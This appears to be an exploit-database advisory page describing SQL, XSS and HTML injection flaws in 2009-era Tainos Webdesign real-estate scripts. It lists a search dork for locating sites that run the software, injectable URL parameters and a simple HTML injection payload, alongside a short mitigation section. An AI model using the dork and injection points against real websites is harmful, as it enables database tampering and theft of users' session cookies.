header-logo
Suggest Exploit
vendor:
All Scripts
by:
CoBRa_21
8,8
CVSS
HIGH
SQL/XSS/HTML Injection
89, 79, 80
CWE
Product Name: All Scripts
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability

Tainos Webdesign is vulnerable to SQL/XSS/HTML Injection. An attacker can inject malicious SQL/XSS/HTML code into the vulnerable parameters of the application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, to steal cookie-based authentication credentials and to execute malicious HTML and script code in the browser of an unsuspecting user in order to steal sensitive information.

Mitigation:

Input validation should be used to prevent SQL/XSS/HTML injection attacks. All input data should be validated and filtered before being passed to the database or browser.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.tainos-webdesign.com

Dork: intext:"© Tainos Webdesign"

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/propertylux.php?ID=1 (SQL)
http://localhost/[path]/property.php?ID=199 (SQL)

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/class.php?Class=Rental&Subclass=
http://localhost/[path]/class.php?Class=Sales&Subclass=
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR